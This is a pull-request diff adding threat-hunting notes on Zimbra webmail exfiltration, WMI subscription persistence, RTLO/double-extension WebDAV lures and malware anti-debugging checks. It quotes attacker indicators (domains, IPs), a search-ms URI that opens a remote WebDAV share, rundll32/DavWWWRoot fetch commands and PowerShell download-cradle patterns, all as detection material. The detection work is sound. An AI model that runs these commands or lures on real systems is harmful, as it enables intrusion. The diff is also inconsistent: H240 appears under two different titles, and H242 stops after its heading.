### PR TITLE
feat: CTI pipeline hunts — 2026-07-25

### DIFF
--- a/Alchemy/M029.md
+++ b/Alchemy/M029.md
@@ -1,0 +1,91 @@
+---
+category: Alchemy
+id: M029
+title: Anomalous mail-data egress volume from the webmail tier to first-seen external domains (Zimbra XSS exfil)
+hypothesis: >-
+  After a zero-click XSS in Zimbra webmail (CVE-2025-66376) executes an obfuscated, Base64-encoded script in the
+  victim's authenticated session, the adversary exfiltrates mailbox contents, contacts, and 2FA/session material out
+  of the webmail tier to attacker infrastructure — often domains masquerading as Zimbra analytics/metadata services.
+  Any single outbound request from a webmail session looks like normal web traffic, so a static rule misses paced
+  theft and floods on busy servers. Modeling each webmail server's (and each authenticated user's) normal outbound
+  volume and destination set makes the theft visible: a sustained egress spike, or a burst of requests to first-seen
+  external domains, far above that entity's learned baseline.
+notes: >-
+  ALCHEMY ANALYTIC — per-server / per-user volumetric + first-seen-destination anomaly detection on webmail egress.
+  PLATFORM: Linux (Zimbra Collaboration Suite mail servers) and the network/proxy tier in front of webmail. Sources:
+  Unit 42, "Russian Global Webmail Espionage" (2026-07-23, tracked as CL-STA-1114 / Void Blizzard / LAUNDRY BEAR),
+  and CISA advisory AA26-204A (Russian state-sponsored phishing targeting Zimbra users, 2026-07-23). The intrusion
+  set exploited CVE-2025-66376 via a phishing email carrying an HTML attachment with an obfuscated Base64 script;
+  observed dwell time averaged ~35 days. Note: Unit 42 does NOT corroborate the Sednit/APT28 attribution some press
+  applied; it tracks the actor as Void Blizzard / LAUNDRY BEAR.
+
+
+  WHY MODEL-ASSISTED (not a static rule): webmail servers make outbound web requests constantly (federation, link
+  previews, integrations), and the XSS payload runs inside a legitimate authenticated session, so exfil traffic is
+  camouflaged. Attackers also pace collection over weeks. The separating signal is deviation from a given server's
+  or user's own egress envelope plus destination novelty — a volumetric/behavioral problem, not a signature. The
+  actor's transport protocol/port and exact volume were NOT published, so a threshold tuned to one campaign will
+  not generalize; per-entity baselining will.
+
+
+  DATA SOURCES / FIELDS: web proxy / NGFW / NetFlow-IPFIX egress from the webmail subnet (bytes_out, dest domain/IP,
+  dest port, request count, TLS SNI, HTTP host + user-agent); Zimbra access/mailbox audit logs (mailbox.log,
+  audit.log) for read/search/export volume per account; DNS logs for first-seen external domain resolution from the
+  mail tier. FEATURES per webmail server AND per authenticated user over a rolling ~30-day baseline: summed
+  outbound bytes to external destinations; count of distinct external domains contacted; share of egress to
+  first-seen / newly-registered domains; request rate to a single external host; egress outside business hours;
+  ratio of current egress to that entity's historical mean; correlation of an egress spike with a preceding
+  inbound HTML-attachment email. MODEL: per-entity baseline + robust outlier scoring (z-score/MAD or isolation
+  forest) on the volume and destination-novelty features; alert when an entity crosses from its normal envelope
+  into sustained high-volume egress, weighted heavily when the destination is first-seen or matches a
+  Zimbra-lookalike naming pattern.
+
+
+  KNOWN-BAD SEED IOCs (for backtest/enrichment, not as the detection): domains masquerading as Zimbra services —
+  zimbra-metadata[.]com, zimbrastat[.]com, zimbrasoft[.]com[.]ua, synacorzimbra[.]nl, mailnalysis[.]com,
+  emailanalytics[.]com[.]ua, analyticemailmeter[.]com, istc-cloud[.]com; IPs 37.120.247[.]228, 64.226.124[.]190,
+  104.248.134[.]194, 185.86.79[.]95, 193.238.152[.]66, 194.156.103[.]193, 216.252.238[.]18/.64/.104. VALIDATION /
+  TUNING: backtest against known heavy periods (mail migrations, bulk-export/eDiscovery, newsletter sends) to set
+  per-entity thresholds; allowlist sanctioned integrations/federation destinations by domain but keep them
+  baselined. NAIVE FOIL: a fixed "N MB/day out of the mail server" threshold — bypassed by paced multi-week
+  exfil and noisy on federated servers; the separating signal is deviation from the entity's own egress baseline
+  plus destination novelty. CROSS-REF: T1114.002 (Remote Email Collection — what is being staged/stolen),
+  T1556.006 (MFA interception — the 2FA/session material the payload also grabs), and T1189 (drive-by/zero-click
+  XSS as the delivery) for the upstream legs.
+tactics:
+  - Exfiltration
+techniques:
+  - T1048.003
+tags:
+  - exfiltration
+  - linux
+  - webmail
+  - zimbra
+  - email_collection
+  - volumetric
+  - model_assisted
+  - void_blizzard
+  - laundry_bear
+  - t1048_003
+  - t1114_002
+  - t1556_006
+submitter:
+  name: Lauren Proehl
+  link: https://x.com/jotunvillur
+---
+
+## Why
+
+- **The request is legitimate; the volume and destination are not.** A webmail server making outbound web requests is normal, and the XSS payload runs inside a real authenticated session, so no single request is malicious — only the deviation from the server's/user's own egress envelope, and the novelty of the destination, separate theft from work. That per-entity anomaly framing is why this is an Alchemy hunt, not a Flame.
+- **Static thresholds lose both ways here.** The actor paced collection over a ~35-day dwell and the campaign's transport/volume were never published, so a fixed MB/day limit is both bypassed by slow exfil and noisy on federated mail servers; a per-entity baseline adapts to each server's normal and catches the relative spike.
+- **Destination novelty is the durable half of the signal.** The operators used domains dressed up as Zimbra analytics/metadata services; modeling the *rate of first-seen external destinations* from the mail tier catches the pattern even after the specific lookalike domains rotate — where an IOC block-list goes stale.
+- **The mail tier is a bright, well-scoped place to watch.** Webmail servers have a small, stable set of legitimate external destinations, so egress anomalies there carry far more signal than the same analytic run against general user browsing.
+
+## References
+
+- [MITRE ATT&CK T1048.003: Exfiltration Over Alternative Protocol — Exfiltration Over Unencrypted Non-C2 Protocol](https://attack.mitre.org/techniques/T1048/003/)
+- [Unit 42 (Palo Alto Networks): Russian Global Webmail Espionage (CL-STA-1114 / Void Blizzard)](https://unit42.paloaltonetworks.com/russian-webmail-espionage/)
+- [CISA Advisory AA26-204A: Russian State-Supported Cyber Actors Conduct Phishing Campaign Targeting Zimbra Collaboration Suite Users](https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-204a)
+- [ESET Research: Operation RoundPress — XSS Exploitation of Webmail Servers (Zimbra/Roundcube/Horde)](https://www.welivesecurity.com/en/eset-research/operation-roundpress/)
+- [Elastic Security Labs: Hunting for Data Exfiltration Over the Network](https://www.elastic.co/security-labs/network-exfiltration-detection)
+- [MITRE ATT&CK T1114.002: Email Collection — Remote Email Collection](https://attack.mitre.org/techniques/T1114/002/)

--- a/Embers/B032.md
+++ b/Embers/B032.md
@@ -1,0 +1,79 @@
+---
+category: Embers
+id: B032
+title: Baseline all permanent WMI event subscriptions to surface rogue CommandLine/ActiveScript consumers
+hypothesis: >-
+  Adversaries persist by writing permanent WMI event subscriptions into root\subscription, but a small set of
+  enterprise-management products (SCCM/MECM, monitoring agents, some vendor installers) legitimately create them too,
+  so a bare "any WMI subscription" rule is noisy and a bare "any consumer running PowerShell" rule risks missing
+  tooling that also does. This hunt first inventories every existing __EventFilter, EventConsumer, and
+  __FilterToConsumerBinding across the estate — recording the WQL trigger, consumer type and command, and the
+  creating process/user — to produce a vetted allowlist of legitimate subscriptions, then flags any consumer that
+  falls outside it: CommandLine/ActiveScript consumers launching interpreters, referencing user-writable paths, or
+  created by a non-management process.
+notes: >-
+  PLATFORM: Windows. BASELINE FIRST (Embers). TRIGGER SOURCE: Rapid7, "From a Single Alert to 1,000 Files: Inside an
+  Exposed WebDAV Malware Delivery Lab" (2026-07-20), which listed WMI event subscription as a persistence mechanism
+  in the delivery kit. This baseline is the prerequisite that makes the paired Flame (H241, T1546.003) able to call
+  a subscription "unexpected."
+
+
+  DATA COLLECTION FIELDS (per subscription object): hostname; __EventFilter name + WQL query text (trigger class,
+  e.g. Win32_PerfFormattedData uptime / __InstanceModificationEvent logon / timer); consumer type
+  (CommandLineEventConsumer vs ActiveScriptEventConsumer vs the benign LogFile/NTEventLog types); consumer name;
+  consumer ACTION (CommandLineTemplate / ExecutablePath, or ScriptText/ScriptingEngine); __FilterToConsumerBinding
+  linkage; creating process image + signer + user (from Sysmon EID 1 near the EID 19/20/21 timestamps); creation
+  timestamp; SYSTEM vs user context. TELEMETRY: Sysmon EID 19/20/21, WMI-Activity operational log EIDs 5859-5861,
+  and host inventory via osquery (wmi_event_filters, wmi_consumers, wmi_filter_consumer_bindings) or
+  Get-WmiObject -Namespace root\subscription.
+
+
+  COLLECTION WINDOW: 30 days to capture reboot/logon/patch-cycle triggers, plus a one-time full repository sweep of
+  all existing subscriptions (persistence may predate the collection window). DELIVERABLE: a per-environment
+  allowlist of vetted subscriptions keyed on {consumer type, normalized consumer action, creating signer}, plus an
+  inventory of every host carrying a CommandLine/ActiveScript consumer — the triage worklist.
+
+
+  IMMEDIATE FLAGS (do not wait for the baseline to finish): (1) a CommandLineEventConsumer whose action runs
+  powershell/cmd/mshta/wscript/cscript/rundll32, contains `-enc`/`-EncodedCommand`/`DownloadString`/`IEX`, or points
+  at %TEMP%/%APPDATA%/ProgramData or another user-writable path; (2) an ActiveScriptEventConsumer with embedded
+  VBScript/JScript; (3) filter + consumer + binding (EID 19+20+21) all created within the same second by a
+  non-management process; (4) any consumer created by an unsigned or first-seen creator process. CROSS-REF: enables
+  H241 (T1546.003 WMI subscription persistence executing an interpreter/LOLBin); relates to T1047 (WMI) and
+  T1059.001/.005 (the PowerShell/VBScript a malicious consumer runs).
+tactics:
+  - Persistence
+  - Privilege Escalation
+techniques:
+  - T1546.003
+tags:
+  - persistence
+  - privilege_escalation
+  - windows
+  - wmi
+  - event_subscription
+  - baseline
+  - fileless
+  - commandlineeventconsumer
+  - t1546_003
+  - t1047
+submitter:
+  name: Lauren Proehl
+  link: https://x.com/jotunvillur
+---
+
+## Why
+
+- **Malicious WMI persistence hides among legitimate management subscriptions, not among noise.** The few products that create permanent subscriptions look structurally similar to an attacker's, so only a vetted allowlist of *which* consumers legitimately exist — keyed on the consumer action and its creating signer — makes a rogue one stand out. That is why this is an Ember, not a Flame.
+- **The repository must be swept, not just watched.** Persistence installed before monitoring began lives silently in the CIM database with no ongoing event; a one-time enumeration of `root\subscription` across the estate is the only way to find pre-existing implants, which a purely streaming rule never sees.
+- **The volume is low enough to inventory completely.** Permanent subscriptions are rare, so unlike most baselines this one can aim for full coverage — every filter, consumer, and binding — turning the baseline itself into a durable asset inventory.
+- **It is the prerequisite for the persistence Flame.** H241 can only call a consumer "unexpected" against this allowlist; without the baseline, every SCCM or monitoring subscription is a false positive and the Flame is unusable.
+
+## References
+
+- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)
+- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)
+- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)
+- [in.security: An Intro into Abusing and Identifying WMI Event Subscriptions for Persistence](https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/)
+- [osquery schema: wmi_event_filters / wmi_consumers / wmi_filter_consumer_bindings](https://osquery.io/schema/current)
+- [Splunk Security Content: WMI Permanent Event Subscription — Sysmon](https://research.splunk.com/endpoint/ad05aae6-3b2a-4f73-af97-57bd26cee3b9/)

--- a/Flames/H240.md
+++ b/Flames/H240.md
@@ -1,6 +1,6 @@
 ---
 id: H240
-category: Command and Control
+category: Flames
 title: Chaos msaRAT headless browser C2 after MSI staging
 hypothesis: >-
   Chaos operators stage `update_ms.msi` under `ProgramData`, load `lib.dll`, then launch Chrome or Edge in headless mode with remote debugging so WebRTC C2 runs through the browser.

--- a/Flames/H240.md
+++ b/Flames/H240.md
@@ -1,0 +1,94 @@
+---
+id: H240
+category: Flames
+title: Double-extension / RTLO-spoofed payloads delivered from a WebDAV share via search-ms
+hypothesis: >-
+  An operator lures a user to a search-ms results window that transparently surfaces a remote WebDAV share, where the
+  payload's true extension (.lnk / .scr / .exe) is hidden behind a spoofed trailing extension built from a double
+  extension, an RTL-Override character (U+202E), homoglyphs, and whitespace padding so the file reads as a benign
+  document (e.g. "ReportFinal.rcs.pdf"). Hunt for the Windows tell of this delivery: the WebClient service starting on
+  a host that does not normally use WebDAV, rundll32.exe loading davclnt.dll,DavSetCookie to a first-seen remote host,
+  and execution of a file whose on-disk name carries a double extension, an RTLO control character, or a real
+  .lnk/.scr extension masquerading as .pdf — landed from a \\host@port\DavWWWRoot path.
+tactics:
+  - Defense Evasion
+techniques:
+  - T1036.007
+tags:
+  - defense_evasion
+  - windows
+  - masquerading
+  - double_extension
+  - rtlo
+  - webdav
+  - search_ms
+  - initial_access
+  - purerat
+  - t1036_007
+  - t1036_002
+  - t1204_002
+submitter:
+  name: Lauren Proehl
+  link: https://x.com/jotunvillur
+required_data_sources:
+  - Sysmon Event ID 1 (Process Create) and Windows Security 4688 — command line and image name with the spoofed extension
+  - Sysmon Event ID 11 (File Create) — dropped .lnk/.scr/.exe in Downloads/%TEMP% with double/RTLO extensions
+  - Sysmon Event ID 3 (Network Connect) / 22 (DNS) — rundll32→davclnt.dll to a remote WebDAV host
+  - WebClient service state-change (System log 7036 / Sysmon 1 for svchost -k WebClientGroup) and proxy WebDAV user-agent
+false_positive_notes: |
+  The davclnt.dll/rundll32 WebDAV telemetry is high-volume where legitimate WebDAV/SharePoint/OneDrive-mounted shares
+  are used, so anchor on FIRST-SEEN remote WebDAV hosts (external IP or \\host@port style) rather than sanctioned
+  internal DAV endpoints, and on the WebClient service transitioning to Running on hosts that normally never use it.
+  Filenames with a genuine second dot ("Q3.Report.pdf") are benign; separate on (a) a real executable extension
+  (.lnk/.scr/.exe/.js) hidden after the display extension, (b) presence of the U+202E RTLO byte or homoglyph
+  characters in the extension region, or (c) whitespace padding before the true extension. Allowlist known-good
+  DAV endpoints and known internal .lnk generators (SCCM, login scripts) before alerting.
+notes: |
+  PLATFORM: Windows. Source: Rapid7, "From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery
+  Lab" (2026-07-20), which recovered an operator's staging server full of bulk-generated lures. Final payload in
+  both observed chains was PureRAT 4.4.3 (build tag 06x12x2026SantaEbash2).
+
+  ATTACK MECHANICS (from the report): a JavaScript-triggered search-ms URI opens a WebDAV share filtered to a single
+  extension — e.g. `search-ms:displayname=Search Results in \\onedrive.cv@80\Downloads\CURP&query=*.scr` — so the
+  victim sees what looks like a local search result. The lures follow a systematic naming scheme
+  `HyperPackSetup.<method>.<trick>.<spoof>.lnk`, and the primary document lure was `ReportFinal.rcs.pdf`, an
+  RTLO-masqueraded .scr. The report explicitly lists three spoofing tricks stacked together: RTLO (U+202E), double
+  extensions, and whitespace padding before .exe / .scr. Sibling delivery vectors in the same kit: UNC paths,
+  library-ms, Control Panel items, and LOLBin proxies (iediagcmd.exe, CustomShellHost.exe, OfficeC2RClient.exe).
+
+  DETECTION SIGNALS (Windows):
+  - Sysmon EID 11 (File Create) for files landing in Downloads/%TEMP% whose name contains U+202E, homoglyph
+    characters in the extension, or a double extension where the TRUE trailing extension is .lnk/.scr/.exe/.js.
+  - WebClient service starting (svchost -k WebClientGroup / System 7036 "WebClient → Running") on a host that does
+    not normally mount WebDAV, immediately followed by:
+  - Sysmon EID 1: `rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie <host>@<port> http://<host>:<port>/`
+    (SysWOW64 variant too) — the WebDAV client fetching content — with Sysmon EID 3 to a first-seen/external host.
+  - Process lineage: explorer.exe → the spoofed .lnk/.scr, or cmd.exe `/c \\<host>@SSL\DavWWWRoot\new.bat`, or a
+    decoy .pdf opened from the same DavWWWRoot path while the real payload executes.
+  - Parse recovered .lnk with LECmd: RelativePath / WorkingDir pointing at `\\<host>@<port>\DavWWWRoot\files`.
+
+  CROSS-REF: pair with T1036.002 (Right-to-Left Override — the RTLO half of the same spoof), T1204.002 (Malicious
+  File — the user double-click this hunt depends on), and T1055 (the report's PureRAT injects into a signed Qihoo
+  360 process after landing). H243 (T1548.002 UAC bypass) and the WMI-persistence hunts (H241/B032) cover the
+  post-execution stages of the same intrusion set.
+---
+# H240
+
+Rapid7's teardown of an exposed WebDAV malware-delivery lab (2026-07-20) recovered thousands of bulk-generated lure files and the operators' own QA notes. The kit's core evasion is filename masquerading: a `search-ms` URI transparently opens a remote WebDAV share filtered to a single extension, and the payload's real `.lnk`/`.scr`/`.exe` extension is buried behind a spoofed `.pdf` built from a **double extension**, an **RTL-Override (U+202E)** character, homoglyphs, and whitespace padding (e.g. `ReportFinal.rcs.pdf`). HEARTH had no coverage for **T1036.007 Double File Extension**; this hunt targets both the on-disk filename artifact and the WebDAV-delivery process/network tell that carries it.
+
+## Why
+
+- **The spoof is the whole point of the click.** Users are trained to trust `.pdf`; the double extension + RTLO makes a `.scr`/`.lnk` read as a document in Explorer and the search-ms window, so catching the filename shape catches the technique before execution, not after.
+- **WebDAV delivery leaves a narrow, low-base-rate trail.** `rundll32.exe` loading `davclnt.dll,DavSetCookie` to a first-seen external host, and the WebClient service starting on a machine that never uses WebDAV, are sharp signals once sanctioned DAV endpoints are baselined out.
+- **The artifact survives infrastructure rotation.** RTLO bytes, homoglyphs, and a hidden true-executable extension are properties of the lure itself — they persist even when the operator changes C2 IPs, so a filename-shape hunt is durable where an IOC block-list is not.
+- **It sits at initial access, upstream of everything expensive.** The same lab's chains end in PureRAT with process injection, UAC bypass, and persistence; interdicting the spoofed-file delivery denies the operator every later stage in one place.
+
+## References
+
+- [MITRE ATT&CK T1036.007: Masquerading — Double File Extension](https://attack.mitre.org/techniques/T1036/007/)
+- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)
+- [Micah Babinski: Search-ms, WebDAV, and Chill — Detecting a [Re-]emerging Initial Access Technique](https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462)
+- [dfir.ch: Abusing the "search-ms" URI Protocol Handler](https://dfir.ch/posts/search-ms_protocol_handler/)
+- [SigmaHQ / Detection.FYI: Suspicious WebDav Client Execution Via Rundll32.EXE](https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution/)
+- [Splunk Security Content: Windows Rundll32 WebDav With Network Connection](https://research.splunk.com/endpoint/f03355e0-28b5-4e9b-815a-6adffc63b38c/)
+- [MITRE ATT&CK T1036.002: Masquerading — Right-to-Left Override](https://attack.mitre.org/techniques/T1036/002/)

--- a/Flames/H241.md
+++ b/Flames/H241.md
@@ -1,0 +1,88 @@
+---
+id: H241
+category: Flames
+title: WMI permanent event subscription persistence executing a script interpreter or LOLBin
+hypothesis: >-
+  An operator establishes fileless persistence by writing a permanent WMI event subscription into root\subscription —
+  an __EventFilter with a WQL trigger (system uptime, logon, or a timer), a CommandLineEventConsumer or
+  ActiveScriptEventConsumer whose action launches a script interpreter / LOLBin (powershell.exe, cmd.exe, mshta.exe,
+  wscript.exe, or an unsigned binary from a user-writable path), and a __FilterToConsumerBinding linking them. Hunt
+  for the near-simultaneous creation of the three subscription components (Sysmon 19/20/21) and for WmiPrvSE.exe /
+  scrcons.exe spawning an interpreter under SYSTEM, where the creator is not a sanctioned management tool.
+tactics:
+  - Persistence
+  - Privilege Escalation
+techniques:
+  - T1546.003
+tags:
+  - persistence
+  - privilege_escalation
+  - windows
+  - wmi
+  - event_subscription
+  - fileless
+  - commandlineeventconsumer
+  - activescripteventconsumer
+  - t1546_003
+  - t1047
+submitter:
+  name: Lauren Proehl
+  link: https://x.com/jotunvillur
+required_data_sources:
+  - Sysmon Event ID 19 (WmiEventFilter), 20 (WmiEventConsumer), 21 (WmiFilterToConsumerBinding)
+  - WMI-Activity operational log Event IDs 5859/5860/5861 (permanent subscription operations)
+  - Sysmon Event ID 1 / Security 4688 — WmiPrvSE.exe or scrcons.exe spawning an interpreter/LOLBin
+  - Sysmon Event ID 7 (Image Load) — WmiPrvSE.exe loading wbemcons.dll (CommandLineEventConsumer runtime)
+false_positive_notes: |
+  A small, stable set of enterprise-management products legitimately create permanent subscriptions (SCCM/MECM,
+  monitoring agents, some vendor installers). These are the benign twin — separate on the CONSUMER ACTION and the
+  CREATOR: sanctioned tools create durable, unchanging subscriptions whose consumer command references the product's
+  own signed binary, whereas malicious ones run powershell/cmd/mshta/wscript, reference user-writable or %TEMP%
+  paths, or embed encoded/obfuscated script. Baseline vetted subscriptions first (see B032) and alert only on
+  consumers outside that allowlist. Sysmon already scopes EID 20 to ActiveScript/CommandLine consumers (the abused
+  types), so this telemetry is low-volume and near-noise-free.
+notes: |
+  PLATFORM: Windows. TRIGGER SOURCE: Rapid7, "From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware
+  Delivery Lab" (2026-07-20), which flagged WMI event subscription as a persistence mechanism in the delivery kit
+  (alongside scheduled tasks `brokerhost`/`net_queue_32` and a Run key). HEARTH had no coverage for T1546.003; this
+  hunt generalizes the technique with the well-established WMI persistence detection stack.
+
+  ATTACK MECHANICS: persistence lives in the WMI/CIM repository, not on disk. Three objects are required and Sysmon
+  logs each: __EventFilter (EID 19 — inspect the WQL, e.g. a trigger on `Win32_PerfFormattedData_PerfOS_System`
+  uptime 200-320s or on logon), an EventConsumer (EID 20 — the two abused types are CommandLineEventConsumer, which
+  runs a command, and ActiveScriptEventConsumer, which runs embedded VBScript/JScript), and a
+  __FilterToConsumerBinding (EID 21). Execution is brokered by trusted WmiPrvSE.exe (and scrcons.exe for script
+  consumers), typically inheriting SYSTEM.
+
+  DETECTION SIGNALS (Windows):
+  - Temporal correlation: Sysmon EID 19 + 20 + 21 created within the same second/minute = a subscription deployed.
+  - EID 20 CommandLineEventConsumer/ActiveScriptEventConsumer whose action contains powershell/cmd/mshta/wscript,
+    `-enc`/`-EncodedCommand`, DownloadString/IEX, or a path under %TEMP%/%APPDATA%/ProgramData.
+  - WMI-Activity operational log EIDs 5859-5861 as a corroborating/second source where Sysmon isn't deployed.
+  - Sysmon EID 7: WmiPrvSE.exe loading wbemcons.dll (CommandLineEventConsumer runtime), or EID 1: scrcons.exe /
+    WmiPrvSE.exe spawning an interpreter under SYSTEM with an anomalous parent.
+  - Host inventory via osquery tables wmi_event_filters / wmi_consumers / wmi_filter_consumer_bindings.
+
+  CROSS-REF: pair with B032 (baseline of legitimate permanent WMI subscriptions) — you cannot call a consumer
+  "unexpected" without that allowlist, so B032 is the prerequisite for this Flame. Also cross-ref T1047 (WMI) for
+  the broader abuse of the WMI service, and T1059.001/.005 for the PowerShell/VBScript the consumer executes.
+---
+# H241
+
+Rapid7's exposed WebDAV delivery lab (2026-07-20) listed WMI event subscription among the kit's persistence options. **T1546.003** is a classic fileless persistence technique: the payload writes an `__EventFilter` (a WQL trigger), a `CommandLineEventConsumer` or `ActiveScriptEventConsumer` (the action), and a `__FilterToConsumerBinding` into `root\subscription`, so a trusted Windows process (`WmiPrvSE.exe`/`scrcons.exe`) re-launches the payload under SYSTEM on every trigger — surviving reboots with nothing on disk. HEARTH had no T1546.003 coverage; this hunt targets the creation telemetry and the SYSTEM-context execution.
+
+## Why
+
+- **Fileless and SYSTEM-context by design.** The persistence lives in the CIM repository, not the filesystem, and executes through a trusted broker, so disk-based and signature detections miss it — creation telemetry (Sysmon 19/20/21) is the reliable catch point.
+- **The telemetry is nearly noise-free.** Permanent WMI subscriptions are rare outside a handful of management tools, so a log-all approach with a small allowlist yields high-fidelity alerts rather than a flood.
+- **Temporal correlation is a strong, durable signal.** Filter + consumer + binding created within the same second is a structural fingerprint of the technique that survives payload and infrastructure changes.
+- **It pairs with a concrete baseline.** The one false-positive source — legitimate management subscriptions — is exactly what B032 inventories, so the two hunts together turn "any subscription" into "any subscription not on the allowlist."
+
+## References
+
+- [MITRE ATT&CK T1546.003: Event Triggered Execution — Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1546/003/)
+- [Rapid7: From a Single Alert to 1,000 Files — Inside an Exposed WebDAV Malware Delivery Lab](https://www.rapid7.com/blog/post/tr-exposed-webdav-malware-delivery-lab-analysis/)
+- [SigmaHQ: WMI Event Subscription (sysmon_wmi_event_subscription.yml)](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml)
+- [Splunk Security Content: Detect WMI Event Subscription Persistence](https://research.splunk.com/endpoint/01d9a0c2-cece-11eb-ab46-acde48001122/)
+- [TrustedSec: Sysmon Community Guide — WMI Events (19/20/21)](https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/WMI-events.md)
+- [Detect.FYI: Hunting WMI Event Subscription Persistence](https://detect.fyi/hunting-wmi-event-subscription-persistence-f087900029f4)

--- a/Flames/H242.md
+++ b/Flames/H242.md
@@ -1,0 +1,97 @@
+---
+id: H242
+category: Flames
+title: Malware self-debugging and debug-register / debugger-process checks to block analysis (I2PRAT, PikaBot)
+hypothesis: >-
+  A loader evades runtime analysis by (a) self-debugging — creating a debug object and attaching to its own freshly
+  spawned child so no external debugger can attach, keeping the child in a pending/suspended state — and/or (b)
+  actively probing for a debugger via debug-register inspection (GetThreadContext reading DR0-DR7),
+  CheckRemoteDebuggerPresent / IsDebuggerPresent, ZwSystemDebugControl, and enumeration of running processes against
+  an analyst-tool ban list (x64dbg, windbg, ida, procmon, wireshark, procexp), terminating or FailFast-ing on a hit.
+  Hunt on Windows for a process opening/creating a debug object against a child it just spawned, and for the burst of
+  self-inspection API/syscall use followed by immediate self-termination.
+tactics:
+  - Defense Evasion
+techniques:
+  - T1622
+tags:
+  - defense_evasion
+  - windows
+  - debugger_evasion
+  - anti_analysis
+  - anti_debugging
+  - i2prat
+  - pikabot
+  - process_injection
+  - t1622
+  - t1497_001
+submitter:
+  name: Lauren Proehl
+  link: https://x.com/jotunvillur
+required_data_sources:
+  - Sysmon Event ID 10 (ProcessAccess) — a process opening another with debug/duplicate rights (PROCESS_ALL_ACCESS, dwDesiredAccess granting DEBUG)
+  - Sysmon Event ID 1 (Process Create) — a child spawned suspended with a spoofed parent (e.g. winlogon.exe), created by a non-system loader
+  - ETW Microsoft-Windows-Threat-Intelligence (NtCreateDebugObject / NtDebugActiveProcess / NtSetContextThread) where EDR exposes it
+  - Sysmon Event ID 8 (CreateRemoteThread) / 25 (Process Tampering) — injection that follows the anti-analysis gate
+false_positive_notes: |
+  Legitimate debuggers, crash-reporting/telemetry agents, and some DRM/anti-cheat products also create debug
+  objects and read thread contexts, so raw NtCreateDebugObject/GetThreadContext use is not malicious on its own.
+  Separate on context: a short-lived, unsigned or newly-written process that debugs a child it just created (rather
+  than a known debugger debugging an unrelated target), that spoofs its parent PID, that enumerates and matches an
+  analyst-tool process list, or that self-terminates within seconds of the checks. Allowlist known debuggers,
+  Visual Studio, WER, and vetted anti-cheat/DRM before alerting; treat the *combination* (self-debug + banned-proc
+  scan + immediate injection) as the signal, not any single API.
+notes: |
+  PLATFORM: Windows. Sources: Sekoia TDR, "RATatouille: Cooking Up Chaos in the I2P Kitchen" (I2PRAT) and Sekoia
+  TDR, "PikaBot: a Guide to its Deep Secrets and Operations." Both malware families gate execution on
+  anti-analysis, and both surfaced T1622 as an uncovered gap.
+
+  ATTACK MECHANICS — two complementary approaches observed:
+  1. I2PRAT self-debugging: the loader creates a debug object and attaches to its own newly spawned installer
+     process so a debugger cannot attach, using NtCreateDebugObject, NtDebugActiveProcess, NtWaitForDebugEvent,
+     NtDebugContinue, and waiting on DbgCreateProcessStateChange to keep the child pending. It also duplicates an
+     elevated SYSTEM process handle (NtDuplicateObject, PROCESS_ALL_ACCESS) and spawns a child with
+     PROCESS_CREATE_FLAGS_INHERIT_HANDLES, spoofing the parent PID as a child of winlogon.exe, then injects via
+     thread execution hijacking (observed "duplicates itself from process ID 6028 to 8912").
+  2. PikaBot active checks: reads debug registers through the thread context via GetThreadContext ("non-zero values
+     in any of these registers may indicate a debugger"), carries CheckRemoteDebuggerPresent and a debug_flag in
+     its stage-2 struct, and enumerates processes with CreateToolhelp32Snapshot / Process32First / Process32Next
+     against an RC4-encrypted ban list (x32dbg.exe, x64dbg.exe, windbg.exe, ImmunityDebugger.exe, idaq/idaq64.exe,
+     Fiddler.exe, "Wireswhar.exe", dumpcap.exe, ProcessHacker.exe, procmon.exe, tcpview.exe, cheatengine variants),
+     terminating on a match. Since Feb 2024 it uses direct syscalls (SysWhispers2) including ZwSystemDebugControl /
+     NtSystemDebugControl to bypass ntdll userland hooks. (Related: Rapid7's PureRAT WebDAV payload calls
+     IsDebuggerPresent and FailFast if monitored, and checks COR_PROFILER — the same defensive gate.)
+
+  DETECTION SIGNALS (Windows):
+  - Sysmon EID 10 (ProcessAccess): SourceImage (unsigned/new) opening a TargetImage it just created with access
+    masks granting debug/duplicate rights; or self-open. GrantedAccess like 0x1FFFFF (PROCESS_ALL_ACCESS).
+  - Sysmon EID 1: a child created SUSPENDED whose ParentImage is spoofed (winlogon.exe) but whose real creator is a
+    loader in %TEMP%/%APPDATA%; correlate CreationTime vs the debug-object access.
+  - ETW-TI (if surfaced by the EDR): NtCreateDebugObject/NtDebugActiveProcess against an own child, NtSetContextThread
+    + NtResumeThread (thread hijack), ZwSystemDebugControl from a non-debugger.
+  - Behavioral bundle: banned-analyst-process enumeration (Toolhelp snapshot) immediately followed by self-exit, or
+    debug checks immediately followed by CreateRemoteThread/process tampering (EID 8/25).
+
+  CROSS-REF: T1497.001 (System Checks — the banned-process/sandbox enumeration is the sibling anti-analysis gate);
+  T1055.003/.012 (thread execution hijacking / process hollowing that these loaders run once the anti-debug gate
+  passes); T1106 (Native API — the Nt*/Zw* direct-syscall usage that carries the checks).
+---
+# H242
+
